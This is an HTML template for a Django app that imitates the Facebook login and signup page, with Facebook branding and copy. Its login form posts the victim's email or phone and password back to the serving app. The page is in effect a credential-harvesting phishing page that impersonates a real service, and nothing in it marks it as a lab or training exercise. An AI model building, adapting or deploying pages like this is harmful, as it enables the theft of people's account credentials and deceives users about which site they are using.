<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
    <style media="screen">
      .navbar {
          background-image: linear-gradient(#4e69a2, #3b5998 50%);
          height: 100px;
          border-top: 0px;
          border-left: 0px;
          border-right: 0px;
          border-bottom: 1px;
          border-color: darkblue;
          border-style: solid;
          width: 100%;
          margin: 0px !important;
          flex-direction: row;
          align-items: center;
          padding-top: 10px;
          padding-left: 100px;
        }
      .btn-login{
        background-color: #4267b2;
        border-color: #29487d;
        color: white;
        border: 1;
        border-radius: 3px;
        border-style: solid;
      }
      .login-form{
        padding-right: 15%;
      }
      .text-field{
        border: 0px;
        padding-left: 4px;
        border: 1px;
        border-radius: 2px;
        border-style: solid;
        border-color: black;
      }
      .signup{
        height: 50px;
        border-radius: 5px;
        border: 0.5px;
        border-style: solid;
        border-color: #bdc7d8;
        padding-left: 10px;
        font-size: 23px;
      }
    .signupbtn{
      background: linear-gradient(#67ae55, #578843);
      background-color: #69a74e;
    box-shadow: inset 0 1px 1px #a4e388;
    border-color: #3b6e22 #3b6e22 #2c5115;
    }
    .term{
      font-size: 11px;
    }
    .signup2{
      width: 560px;
    }
    </style>
    <meta charset="utf-8">
    <title>Facebook</title>
  </head>
  <body  style="background-color:#e5e8f1;">
    <div class="navbar">
      <img src="https://bikealarmman.com/images/bam-facebook-logo.png" style="height: 60px; width:auto;" alt="">
      <div class="row login-form">
        <form method="POST">
          {% csrf_token %}
          <table class="login-table">
            <tbody>
              <tr>
                <td><span class="text-white">Email or phone</span></td>
                <td><span class="text-white">Password</span></td>
                <td></td>
              </tr>
              <tr>
                <td> <input type="text" class="text-field" name="username" value=""> </td>
                <td> <input type="password" name="password" class="text-field" value=""> </td>
                <td> <input type="submit" class="btn-login" value="Log In"> </td>
              </tr>
              <tr>
                <td></td>
                <td><span class="text-white"><h6>Forgotten account?</h6></span></td>
                <td></td>
              </tr>
            </tbody>
          </table>
        </form>
      </div>
    </div>
    <div class="row row-cols-2">
      <div class="col">
        <div class="ml-5 container mt-5">
          <h4 style="color: #0e385f;">Facebook helps you connect and share with the <br> people in your life.</h4>
          <img src="https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/7XdR1KwCifL.png" style="width: 536px;height: 194px;" alt="">
        </div>
      </div>
      <div class="col">
        <div class="container mt-3">
        </div>
          <h1 style="color:#333;">Create an account</h1>
          <h5>It's quick and easy.</h5>
              <input class="signup mt-2" type="text" placeholder="First Name" value="">
              <input class=" signup" type="text" placeholder="Surname" value="">
              <br>
              <input type="text" placeholder="Mobile number or email address" class="mt-2 signup  signup2"  name="email" value="">
              <br>
              <input type="password" placeholder="New password" class="mt-2 signup  signup2" name="" value="">
              <h4 class="mt-2" style="color:#90949c;">Birthday</h4>
              <select class="mt-2 signup" name="">
                <option value="">01</option>
              </select>
              <select class="mt-2 signup" name="">
                <option value="">Jan</option>
              </select>
              <select class="mt-2 signup" name="">
                <option value="">2020</option>
              </select>
              <h4 class="mt-2" style="color:#90949c;">Gender</h4>
              <input type="radio" name="female" placeholder="" value="">
              <label for="female"><h5>Female</h5></label>
              <input type="radio"class="ml-3" name="male" placeholder="" value="">
              <label for="male"><h5>Male</h5></label>
              <p class="mt-1 term" style="color:#777;">By clicking Sign Up, you agree to our Terms, Data Policy and <br> Cookie Policy. You may receive SMS notifications from us and <br> can opt out at any time.</p>
              <input type="submit" name="" class="btn btn-lg btn-success signupbtn" value="Sign Up">
          </div>
      </div>
    </div>
<hr>
  </body>
</html>
